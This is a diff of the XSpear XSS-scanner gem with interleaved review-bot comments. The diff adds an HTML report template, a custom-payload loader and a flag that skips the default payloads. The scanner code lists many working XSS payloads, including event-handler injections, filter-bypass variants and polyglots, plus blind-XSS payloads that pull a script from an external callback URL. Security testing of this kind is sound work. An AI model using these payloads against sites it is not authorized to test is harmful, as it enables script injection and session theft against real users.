+ @import url(https://fonts.googleapis.com/css?family=Lato:100,300,400,700);
166
+ @import url(https://maxcdn.bootstrapcdn.com/font-awesome/4.2.0/css/font-awesome.min.css);
167
+
168
+ html {
169
+ height: 100%;
170
+ font-family: 'Lato', sans-serif;
171
+ -webkit-user-select: none;
172
+ color:rgba(255, 255, 255, 0.4);
173
+ }
174
+ body {
175
+ height: 100%;
176
+ margin: 0;
177
+ background: #252C33;
178
+ }
179
+ * {
180
+ box-sizing: border-box;
181
+ word-break: keep-all;
182
+ }
183
+
184
+ ::-webkit-scrollbar {
185
+ min-width: 12px;
186
+ width: 12px;
187
+ max-width: 12px;
188
+ min-height: 12px;
189
+ height: 12px;
190
+ max-height: 12px;
191
+ background-color: #252C33;
192
+ }
193
+ ::-webkit-scrollbar-thumb {
194
+ background: rgba(255,255,255,0.1);
195
+ border: solid 3px #252C33;
196
+ border-radius: 100px;
197
+ }
198
+ ::-webkit-scrollbar-thumb:hover {
199
+ background: rgba(255,255,255,0.2);
200
+ }
201
+ ::-webkit-scrollbar-thumb:active {
202
+ background: rgba(255,255,255,0.2);
203
+ }
204
+ ::-webkit-scrollbar-button {
205
+ display: none;
206
+ height: 0px;
207
+ }
208
+
209
+ /* CONTAINER */
210
+ #container {
211
+ display: table;
212
+ width: 100%;
213
+ background: #252C33;
214
+ margin: 0px auto;
215
+ border-radius: 0px;
216
+ }
217
+
218
+ /* Side Bar */
219
+ #sideMenu {
220
+ width: 240px;
221
+ height: 100%;
222
+ padding: 30px;
223
+ border-right: 1px solid rgba(0,0,0,.1);
224
+ background: #1b232a;
225
+ display: table-cell;
226
+ vertical-align: top;
227
+ color: #fff;
228
+ }
229
+ #sideMenuFixed{
230
+ position: fixed;
231
+ top: 0px;
232
+ left: 0px;
233
+ width: 240px;
234
+ height: 100%;
235
+ padding: 30px;
236
+ border-right: 1px solid rgba(0,0,0,.1);
237
+ background: #1b232a;
238
+ z-index: 9;
239
+ }
240
+ #sidecontent{
241
+ position: fixed;
242
+ width: 200px;
243
+ z-index: 10;
244
+ }
245
+ #sidecontent h1:first-child{
246
+ color: maroon;
247
+ text-shadow: 5px 5px 0px rgba(0,0,0,.2);
248
+ font-weight: 700;
249
+ font-size: 27px;
250
+ margin-left: -8px;
251
+ }
252
+ .menu {
253
+ list-style: none;
254
+ margin: 24px 0;
255
+ padding: 0;
256
+ width: 100%;
257
+ }
258
+ .menu li {
259
+ display: block;
260
+ height: 30px;
261
+ width: 100%;
262
+ line-height: 30px;
263
+ font-size: 14px;
264
+ font-weight: 300;
265
+ color: rgba(255, 255, 255, .7);
266
+ position: relative;
267
+ cursor: pointer;
268
+ }
269
+ .menu li:hover {
270
+ color: #FFF;
271
+ }
272
+ .menu li:first-child {
273
+ height: 35px;
274
+ line-height: 35px;
275
+ font-size: 16px;
276
+ font-weight: 700;
277
+ color: #DDD;
278
+ background: rgba(0,0,0,.08);
279
+ margin-left: -18px;
280
+ padding: 0px 10px;
281
+ border-radius: 8px;
282
+ cursor: default;
283
+ }
284
+ .addCategory {
285
+ font-size: 13px;
286
+ font-weight: 200;
287
+ color: rgba(255, 255, 255, .2);
288
+ }
289
+ .addCategory:hover {
290
+ color: #fff;
291
+ }
292
+
293
+ /* Content */
294
+ #content {
295
+ width: calc(100% - 240px);
296
+ height: 100%;
297
+ padding: 25px;
298
+ display: table-cell;
299
+ }
300
+
301
+ a{
302
+ color:rgba(255, 255, 255, .8);
303
+ }
304
+
305
+ /* Table */
306
+ table {
307
+ width: 100%;
308
+ border-collapse: collapse;
309
+ }
310
+ th {
311
+ text-align: left;
312
+ color: #fff;
313
+ font-weight: 400;
314
+ font-size: 13px;
315
+ text-transform: uppercase;
316
+ border-bottom: 1px solid rgba(255, 255, 255, 0.1);
317
+ padding: 0 10px;
318
+ padding-bottom: 14px;
319
+ }
320
+ tr:not(:first-child):hover {
321
+ background: rgba(255, 255, 255, 0.03);
322
+ }
323
+ td {
324
+ height: 40px;
325
+ line-height: 40px;
326
+ font-weight: 300;
327
+ color: white;
328
+ padding: 0 10px;
329
+ vertical-align: top;
330
+ }
331
+ /* Headers */
332
+ h1 {
333
+ font-size: 13px;
334
+ font-weight: 200;
335
+ letter-spacing: 1px;
336
+ text-transform: uppercase;
337
+ margin: 0;
338
+ }
339
+ h2 {
340
+ float: left;
341
+ letter-spacing: 1px;
342
+ margin: 0;
343
+ color: white;
344
+ }
345
+ h3 {
346
+ float: left;
347
+ color: #fff;
348
+ font-size: 32px;
349
+ font-weight: 300;
350
+ margin: 0;
351
+ margin-top: 8%;
352
+ margin-left: 20px;
353
+ margin-bottom: 6px;
354
+ }
355
+ .LOW {
356
+ background-color: darkgoldenrod;
357
+ }
358
+ .MEDIUM {
359
+ background-color: sienna;
360
+ }
361
+ .HIGH {
362
+ background-color: firebrick;
363
+ }
364
+ .VULN {
365
+ background-color: maroon;
366
+ }
367
+ .ISSUE{
368
+ border: 1px solid white;
369
+ }
370
+ code {
371
+ background: black;
372
+ border: 1px solid;
373
+ padding: 3px;
374
+ border-radius: 5px;
375
+ color: white;
376
+ }
377
+ </style>
378
+ <div id='container'>
379
+ <div id='sideMenu'>
380
+ <div id='sideMenuFixed'></div>
381
+ <div id='sidecontent'>
382
+ <h1>XSPEAR</h1> v#{XSpear::VERSION}
383
+
384
+ <ul class='menu'>
385
+ <li><a href='#summary'>Report</a></li>
386
+ <li><a href='#issues'>Issues</a></li>
387
+ <li><a href='#available'>Available Objects</a></li>
388
+ <li><a href='#raw_query'>Raw Query</a></li>
389
+ </ul>
390
+ <ul class='menu'>
391
+ <li><a href='https://github.com/hahwul/XSpear'>About XSpear</a></li>
392
+ <li><a href='https://github.com/hahwul/XSpear/issues/new'>Submit Bugs</a></li>
393
+ </ul>
394
+ </div>
395
+ </div>
396
+ <div id='content'>
397
+ <h2 id=summary>Summary</h2><br><br>
398
+ #{t_info}
399
+ <br><br><h2 id=issues>Issues</h2><br>
400
+ <table>
401
+ <tr>
402
+ <td>No</td><td>Type</td><td>Issue</td><td>Method</td><td>Parameter</td><td>Payload</td><td>Description</td>
403
+ </tr>
404
+ #{t_issue}
405
+ </table>
406
+ <br><br><h2 id=available>Available Objects</h2><br><br>
407
+ #{t_available}
408
+ <br><br><h2 id=raw_query>Raw Query</h2><br><br>
409
+ #{t_rawquery}
410
+ </div>
411
+ </div>
412
+ """
413
+ return report
414
+ end
415
+
65
416
  def to_json
66
417
  buffer = []
67
418
  @issue.each do |i|
@@ -80,8 +431,6 @@ class XspearRepoter
80
431
  hash.to_json
81
432
  end
82
433
 
83
- def to_html; end
84
-
85
434
  def to_cli
86
435
  rurl = ""
87
436
  if @url.length > 66
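Review bot: In to_html the parameter name is interpolated unescaped at `t_available = t_available + "<code>#{key}</code> param<br>"`, while every other value in the same report (URL, issue text, payload, description, filtered objects) goes through CGI.escapeHTML; parameter names come from the supplied query string and the report is meant to be opened in a browser, so a name containing `<` or `&` would render as markup. Change it to `t_available = t_available + "<code>#{CGI.escapeHTML key.to_s}</code> param<br>"`. The bare `rescue` around the per-parameter block and the empty `if @filtered_objects.length == 0 ... end` hide failures silently; log the exception in the rescue and drop the empty conditional. The stylesheet `@import`s from fonts.googleapis.com and maxcdn.bootstrapcdn.com also mean that opening a local report makes outbound requests; consider inlining the styles or dropping the imports.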
@@ -1,3 +1,3 @@
1
1
  module XSpear
2
- VERSION = "1.3.3"
2
+ VERSION = "1.4.0"
3
3
  end
data/lib/XSpear.rb CHANGED
@@ -23,11 +23,21 @@ class XspearScan
23
23
  else
24
24
  @params = options['params'].split(",")
25
25
  end
26
+ if options['cp'].nil?
27
+ @custom_payload = nil
28
+ else
29
+ @custom_payload = File.open(options['cp'])
30
+ end
26
31
  if options['all'] == true
27
32
  @all = true
28
33
  else
29
34
  @all = false
30
35
  end
36
+ if options['nx'] == true
37
+ @nx = true
38
+ else
39
+ @nx = false
40
+ end
31
41
  @thread = options['thread']
32
42
  @output = options['output']
33
43
  @verbose = options['verbose']
@@ -485,12 +495,21 @@ class XspearScan
485
495
  end
486
496
  end.each(&:join)
487
497
  end
498
+
488
499
  if @all == true
489
500
  log('s',"used test-all-params mode(-a)")
490
- log('s',"creating a test query all param")
501
+ if @blind_url.nil?
502
+ log('s',"creating a test query all param")
503
+ else
504
+ log('s',"creating a test query all param + blind XSS")
505
+ end
491
506
  else
492
507
  log('s',"used test-reflected-params mode(default)")
493
- log('s',"creating a test query [for reflected #{@reflected_params.length} param + blind XSS ]")
508
+ if @blind_url.nil?
509
+ log('s',"creating a test query [for reflected #{@reflected_params.length} param ]")
510
+ else
511
+ log('s',"creating a test query [for reflected #{@reflected_params.length} param + blind XSS ]")
512
+ end
494
513
  end
495
514
  @param_check_switch = false
496
515
  ## [ XSS Scanning ]
@@ -520,52 +539,53 @@ class XspearScan
520
539
  end
521
540
 
522
541
 
523
- # Check Common XSS Payloads
524
- onfocus_tags = [
525
- "input",
526
- "select",
527
- "textarea",
528
- "keygen"
529
- ]
530
- r.push makeQueryPattern('x', '"><script>alert(45)</script>', '<script>alert(45)</script>', 'h', "reflected "+"XSS Code".red, CallbackStringMatch)
531
- r.push makeQueryPattern('x', '<svg/onload=alert(45)>', '<svg/onload=alert(45)>', 'h', "reflected "+"XSS Code".red, CallbackStringMatch)
532
- r.push makeQueryPattern('x', '<img/src onerror=alert(45)>', '<img/src onerror=alert(45)>', 'h', "reflected "+"XSS Code".red, CallbackStringMatch)
533
- r.push makeQueryPattern('x', '"><scr<script>ipt>alert(45)</scr<script>ipt>', '<script>alert(45)</script>', 'h', "reflected "+"XSS Code".red, CallbackStringMatch)
534
- r.push makeQueryPattern('x', '"><iframe/src=JavaScriPt:alert(45)>', '"><iframe/src=JavaScriPt:alert(45)>', 'h', "reflected "+"XSS Code".red, CallbackStringMatch)
535
- r.push makeQueryPattern('x', '"\'><video/poster/onerror=alert(45)>', '<video/poster/onerror=alert(45)>', 'h', "reflected "+"HTML5 XSS Code".red, CallbackStringMatch)
536
- r.push makeQueryPattern('x', '"\'><details/open/ontoggle="alert`45`">', '<details/open/ontoggle="alert`45`">', 'h', "reflected "+"HTML5 XSS Code".red, CallbackStringMatch)
537
- r.push makeQueryPattern('x', '"\'><audio src onloadstart=alert(45)>', '<audio src onloadstart=alert(45)>', 'h', "reflected "+"HTML5 XSS Code".red, CallbackStringMatch)
538
- r.push makeQueryPattern('x', '"\'><marquee onstart=alert(45)>', '<marquee onstart=alert(45)>', 'h', "reflected "+"HTML5 XSS Code".red, CallbackStringMatch)
539
- r.push makeQueryPattern('x', '"\'><meter onmouseover=alert(45)>0</meter>', '<meter onmouseover=alert(45)>0</meter>', 'h', "reflected "+"HTML5 XSS Code".red, CallbackStringMatch)
540
- r.push makeQueryPattern('x', '"\'><svg><animate xlink:href=#xss attributeName=href dur=5s repeatCount=indefinite keytimes=0;0;1 values="https://portswigger.net?&semi;javascript:alert(1)&semi;0" /><a id=xss><text x=20 y=20>XSS</text></a>', '<svg><animate xlink:href=#xss attributeName=href dur=5s repeatCount=indefinite keytimes=0;0;1 values="https://portswigger.net?&semi;javascript:alert(1)&semi;0" />', 'h', "reflected "+"SVG Animate XSS".red, CallbackStringMatch)
541
-
542
-
543
- onfocus_tags.each do |t|
544
- r.push makeQueryPattern('x', "\"'><#{t} autofocus onfocus=alert(45)>", "<#{t} autofocus onfocus=alert(45)>", 'h', "reflected "+"onfocus XSS Code".red, CallbackStringMatch)
545
- end
546
-
547
- # Check Selenium Common XSS Payloads
548
- r.push makeQueryPattern('x', '"><script>alert(45)</script>', '<script>alert(45)</script>', 'v', "triggered ".yellow+"<script>alert(45)</script>".red, CallbackXSSSelenium)
549
- r.push makeQueryPattern('x', '"><svgonload=alert(45)>', '<svg(0x0c)onload=alert(1)>', 'v', "triggered ".yellow+"<svg(0x0c)onload=alert(1)>".red, CallbackXSSSelenium)
550
- r.push makeQueryPattern('x', '<xmp><p title="</xmp><svg/onload=alert(45)>">', '<xmp><p title="</xmp><svg/onload=alert(45)>">', 'v', "triggered ".yellow+"<xmp><p title='</xmp><svg/onload=alert(45)>'>".red, CallbackXSSSelenium)
551
- r.push makeQueryPattern('x', '\'"><svg/onload=alert(45)>', '\'"><svg/onload=alert(45)>', 'v', "triggered ".yellow+"<svg/onload=alert(45)>".red, CallbackXSSSelenium)
552
- r.push makeQueryPattern('x', '"\'><video/poster/onerror=alert(45)>', '<video/poster/onerror=alert(45)>', 'v', "triggered ".yellow+"<video/poster/onerror=alert(45)>".red, CallbackXSSSelenium)
553
- r.push makeQueryPattern('x', '"\'><details/open/ontoggle="alert(45)">', '<details/open/ontoggle="alert(45)">', 'v', "triggered ".yellow+"<details/open/ontoggle=\"alert(45)\">".red, CallbackXSSSelenium)
554
- r.push makeQueryPattern('x', '"\'><audio src onloadstart=alert(45)>', '<audio src onloadstart=alert(45)>', 'v', "triggered ".yellow+"<audio src onloadstart=alert(45)>".red, CallbackXSSSelenium)
555
- r.push makeQueryPattern('x', '"\'><marquee onstart=alert(45)>', '<marquee onstart=alert(45)>', 'v', "triggered ".yellow+"<marquee onstart=alert(45)>".red, CallbackXSSSelenium)
556
- r.push makeQueryPattern('x', '"\'><svg/whatthe=""onload=alert(45)>', '<svg/whatthe=""onload=alert(45)>', 'v', "triggered ".yellow+"<svg/whatthe=""onload=alert(45)>".red, CallbackXSSSelenium)
557
- # + in Javascript payloads
558
- r.push makeQueryPattern('x', '\'+alert(45)+\'', 'alert(45)', 'v', "triggered ".yellow+"in JS".red, CallbackXSSSelenium)
559
- r.push makeQueryPattern('x', '"+alert(45)+"', 'alert(45)', 'v', "triggered ".yellow+"in JS".red, CallbackXSSSelenium)
560
- r.push makeQueryPattern('x', '\'%2Balert(45)%2B\'', 'alert(45)', 'v', "triggered ".yellow+"in JS".red, CallbackXSSSelenium)
561
- r.push makeQueryPattern('x', '"%2Balert(45)%2B"', 'alert(45)', 'v', "triggered ".yellow+"in JS".red, CallbackXSSSelenium)
562
-
563
- # Check Selenium XSS Polyglot
564
- r.push makeQueryPattern('x', 'jaVasCript:/*-/*`/*\`/*\'/*"/**/(/* */oNcliCk=alert(45) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(45)//>\x3e', '\'"><svg/onload=alert(45)>', 'v', "triggered ".yellow+"XSS Polyglot payload".red, CallbackXSSSelenium)
565
- r.push makeQueryPattern('x', 'javascript:"/*`/*\"/*\' /*</stYle/</titLe/</teXtarEa/</nOscript></Script></noembed></select></template><FRAME/onload=/**/alert(45)//-->&lt;<sVg/onload=alert`45`>', '\'"><svg/onload=alert(45)>', 'v', "triggered ".yellow+"XSS Polyglot payload".red, CallbackXSSSelenium)
566
- r.push makeQueryPattern('x', 'javascript:"/*\'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert(45)//>', '\'"><svg/onload=alert(45)>', 'v', "triggered ".yellow+"XSS Polyglot payload".red, CallbackXSSSelenium)
542
+ if @nx != true
543
+ # Check Common XSS Payloads
544
+ onfocus_tags = [
545
+ "input",
546
+ "select",
547
+ "textarea",
548
+ "keygen"
549
+ ]
550
+ r.push makeQueryPattern('x', '"><script>alert(45)</script>', '<script>alert(45)</script>', 'h', "reflected "+"XSS Code".red, CallbackStringMatch)
551
+ r.push makeQueryPattern('x', '<svg/onload=alert(45)>', '<svg/onload=alert(45)>', 'h', "reflected "+"XSS Code".red, CallbackStringMatch)
552
+ r.push makeQueryPattern('x', '<img/src onerror=alert(45)>', '<img/src onerror=alert(45)>', 'h', "reflected "+"XSS Code".red, CallbackStringMatch)
553
+ r.push makeQueryPattern('x', '"><scr<script>ipt>alert(45)</scr<script>ipt>', '<script>alert(45)</script>', 'h', "reflected "+"XSS Code".red, CallbackStringMatch)
554
+ r.push makeQueryPattern('x', '"><iframe/src=JavaScriPt:alert(45)>', '"><iframe/src=JavaScriPt:alert(45)>', 'h', "reflected "+"XSS Code".red, CallbackStringMatch)
555
+ r.push makeQueryPattern('x', '"\'><video/poster/onerror=alert(45)>', '<video/poster/onerror=alert(45)>', 'h', "reflected "+"HTML5 XSS Code".red, CallbackStringMatch)
556
+ r.push makeQueryPattern('x', '"\'><details/open/ontoggle="alert`45`">', '<details/open/ontoggle="alert`45`">', 'h', "reflected "+"HTML5 XSS Code".red, CallbackStringMatch)
557
+ r.push makeQueryPattern('x', '"\'><audio src onloadstart=alert(45)>', '<audio src onloadstart=alert(45)>', 'h', "reflected "+"HTML5 XSS Code".red, CallbackStringMatch)
558
+ r.push makeQueryPattern('x', '"\'><marquee onstart=alert(45)>', '<marquee onstart=alert(45)>', 'h', "reflected "+"HTML5 XSS Code".red, CallbackStringMatch)
559
+ r.push makeQueryPattern('x', '"\'><meter onmouseover=alert(45)>0</meter>', '<meter onmouseover=alert(45)>0</meter>', 'h', "reflected "+"HTML5 XSS Code".red, CallbackStringMatch)
560
+ r.push makeQueryPattern('x', '"\'><svg><animate xlink:href=#xss attributeName=href dur=5s repeatCount=indefinite keytimes=0;0;1 values="https://portswigger.net?&semi;javascript:alert(1)&semi;0" /><a id=xss><text x=20 y=20>XSS</text></a>', '<svg><animate xlink:href=#xss attributeName=href dur=5s repeatCount=indefinite keytimes=0;0;1 values="https://portswigger.net?&semi;javascript:alert(1)&semi;0" />', 'h', "reflected "+"SVG Animate XSS".red, CallbackStringMatch)
561
+
562
+
563
+ onfocus_tags.each do |t|
564
+ r.push makeQueryPattern('x', "\"'><#{t} autofocus onfocus=alert(45)>", "<#{t} autofocus onfocus=alert(45)>", 'h', "reflected "+"onfocus XSS Code".red, CallbackStringMatch)
565
+ end
567
566
 
567
+ # Check Selenium Common XSS Payloads
568
+ r.push makeQueryPattern('x', '"><script>alert(45)</script>', '<script>alert(45)</script>', 'v', "triggered ".yellow+"<script>alert(45)</script>".red, CallbackXSSSelenium)
569
+ r.push makeQueryPattern('x', '"><svgonload=alert(45)>', '<svg(0x0c)onload=alert(1)>', 'v', "triggered ".yellow+"<svg(0x0c)onload=alert(1)>".red, CallbackXSSSelenium)
570
+ r.push makeQueryPattern('x', '<xmp><p title="</xmp><svg/onload=alert(45)>">', '<xmp><p title="</xmp><svg/onload=alert(45)>">', 'v', "triggered ".yellow+"<xmp><p title='</xmp><svg/onload=alert(45)>'>".red, CallbackXSSSelenium)
571
+ r.push makeQueryPattern('x', '\'"><svg/onload=alert(45)>', '\'"><svg/onload=alert(45)>', 'v', "triggered ".yellow+"<svg/onload=alert(45)>".red, CallbackXSSSelenium)
572
+ r.push makeQueryPattern('x', '"\'><video/poster/onerror=alert(45)>', '<video/poster/onerror=alert(45)>', 'v', "triggered ".yellow+"<video/poster/onerror=alert(45)>".red, CallbackXSSSelenium)
573
+ r.push makeQueryPattern('x', '"\'><details/open/ontoggle="alert(45)">', '<details/open/ontoggle="alert(45)">', 'v', "triggered ".yellow+"<details/open/ontoggle=\"alert(45)\">".red, CallbackXSSSelenium)
574
+ r.push makeQueryPattern('x', '"\'><audio src onloadstart=alert(45)>', '<audio src onloadstart=alert(45)>', 'v', "triggered ".yellow+"<audio src onloadstart=alert(45)>".red, CallbackXSSSelenium)
575
+ r.push makeQueryPattern('x', '"\'><marquee onstart=alert(45)>', '<marquee onstart=alert(45)>', 'v', "triggered ".yellow+"<marquee onstart=alert(45)>".red, CallbackXSSSelenium)
576
+ r.push makeQueryPattern('x', '"\'><svg/whatthe=""onload=alert(45)>', '<svg/whatthe=""onload=alert(45)>', 'v', "triggered ".yellow+"<svg/whatthe=""onload=alert(45)>".red, CallbackXSSSelenium)
577
+ # + in Javascript payloads
578
+ r.push makeQueryPattern('x', '\'+alert(45)+\'', 'alert(45)', 'v', "triggered ".yellow+"in JS".red, CallbackXSSSelenium)
579
+ r.push makeQueryPattern('x', '"+alert(45)+"', 'alert(45)', 'v', "triggered ".yellow+"in JS".red, CallbackXSSSelenium)
580
+ r.push makeQueryPattern('x', '\'%2Balert(45)%2B\'', 'alert(45)', 'v', "triggered ".yellow+"in JS".red, CallbackXSSSelenium)
581
+ r.push makeQueryPattern('x', '"%2Balert(45)%2B"', 'alert(45)', 'v', "triggered ".yellow+"in JS".red, CallbackXSSSelenium)
582
+
583
+ # Check Selenium XSS Polyglot
584
+ r.push makeQueryPattern('x', 'jaVasCript:/*-/*`/*\`/*\'/*"/**/(/* */oNcliCk=alert(45) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(45)//>\x3e', '\'"><svg/onload=alert(45)>', 'v', "triggered ".yellow+"XSS Polyglot payload".red, CallbackXSSSelenium)
585
+ r.push makeQueryPattern('x', 'javascript:"/*`/*\"/*\' /*</stYle/</titLe/</teXtarEa/</nOscript></Script></noembed></select></template><FRAME/onload=/**/alert(45)//-->&lt;<sVg/onload=alert`45`>', '\'"><svg/onload=alert(45)>', 'v', "triggered ".yellow+"XSS Polyglot payload".red, CallbackXSSSelenium)
586
+ r.push makeQueryPattern('x', 'javascript:"/*\'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert(45)//>', '\'"><svg/onload=alert(45)>', 'v', "triggered ".yellow+"XSS Polyglot payload".red, CallbackXSSSelenium)
568
587
 
588
+ end
569
589
  # Check Blind XSS Payload
570
590
  if !@blind_url.nil?
571
591
  r.push makeQueryPattern('f', "\"'><script src=#{@blind_url}></script>", "BLINDNOTDETECTED", 'i', "", CallbackNotAdded)
@@ -574,6 +594,20 @@ class XspearScan
574
594
  r.push makeQueryPattern('f', "\"'><iframe src=javascript:$.getScript('#{@blind_url}')></iframe>", "BLINDNOTDETECTED", 'i', "", CallbackNotAdded)
575
595
  end
576
596
 
597
+ if !@custom_payload.nil?
598
+ log('s','load custom payload')
599
+ cps = JSON.parse @custom_payload.read
600
+ cps.each do |cp|
601
+ if cp['callback'] == 'P1'
602
+ r.push makeQueryPattern('x', cp['payload'], cp['payload'], 'h', "reflected "+"Custom Payload #{cp['descript']} ".red, CallbackStringMatch)
603
+ elsif cp['callback'] == 'P2'
604
+ r.push makeQueryPattern('x', cp['payload'], 'alert(45)', 'v', "triggered ".yellow+"Custom Payload #{cp['descript']}".red, CallbackXSSSelenium)
605
+ else
606
+
607
+ end
608
+ end
609
+ log('s',"loaded and creating #{cps.length} custom payloads")
610
+ end
577
611
 
578
612
  r = r.flatten
579
613
  r = r.flatten
@@ -582,7 +616,8 @@ class XspearScan
582
616
  if @verbose.to_i == 1
583
617
  @progress_bar = ProgressBar.new(r.length)
584
618
  end
585
- threads = []
619
+
620
+
586
621
  r.each_slice(@thread) do |jobs|
587
622
  jobs.map do |node|
588
623
  Thread.new do
@@ -606,12 +641,15 @@ class XspearScan
606
641
  end.each(&:join)
607
642
  end
608
643
 
609
-
610
644
  @report.set_filtered @filtered_objects
611
645
  @report.set_endtime
612
646
  log('s', "finish scan. the report is being generated..")
613
647
  if @output == 'json'
614
648
  puts @report.to_json
649
+ elsif @output == 'html'
650
+ f = File.open 'report.html', 'w+'
651
+ f.write @report.to_html
652
+ log('s', "generate html report file. please open ./report.html file")
615
653
  else
616
654
  @report.to_cli
617
655
  end
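Review bot: The html branch opens the report with `File.open 'report.html', 'w+'` and never closes it, relying on process exit to flush the buffered write; `File.write 'report.html', @report.to_html` does the same in one call and releases the handle. The filename is fixed and relative to the working directory, so repeated runs silently overwrite the previous report — the log message should say so, or the path should become an option. In the custom-payload loop the `else` branch drops entries with an unrecognised `callback` without any message while the following log claims all `cps.length` payloads were loaded; log the skipped entry, e.g. `log('s', "skipped custom payload #{cp['descript']}: unknown callback #{cp['callback']}")`. The `P2` path also hard-codes `'alert(45)'` as the expected string, so a custom Selenium payload that does not call alert(45) can never be reported as triggered; that constraint belongs in the option help or a comment next to the call.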
metadata CHANGED
@@ -1,14 +1,14 @@
1
1
  --- !ruby/object:Gem::Specification
2
2
  name: XSpear
3
3
  version: !ruby/object:Gem::Version
4
- version: 1.3.3
4
+ version: 1.4.0
5
5
  platform: ruby
6
6
  authors:
7
7
  - hahwul
8
8
  autorequire:
9
9
  bindir: exe
10
10
  cert_chain: []
11
- date: 2020-02-07 00:00:00.000000000 Z
11
+ date: 2020-02-12 00:00:00.000000000 Z
12
12
  dependencies:
13
13
  - !ruby/object:Gem::Dependency
14
14
  name: colorize
@@ -186,11 +186,12 @@ files:
186
186
  - LICENSE.txt
187
187
  - README.md
188
188
  - Rakefile
189
- - XSpear-1.3.2.gem
189
+ - XSpear-1.3.3.gem
190
190
  - XSpear.gemspec
191
191
  - bin/console
192
192
  - bin/setup
193
193
  - config.json
194
+ - custom_payload.json
194
195
  - exe/XSpear
195
196
  - forBurp/README.md
196
197
  - forBurp/otwa.sh
data/XSpear-1.3.2.gem DELETED
Binary file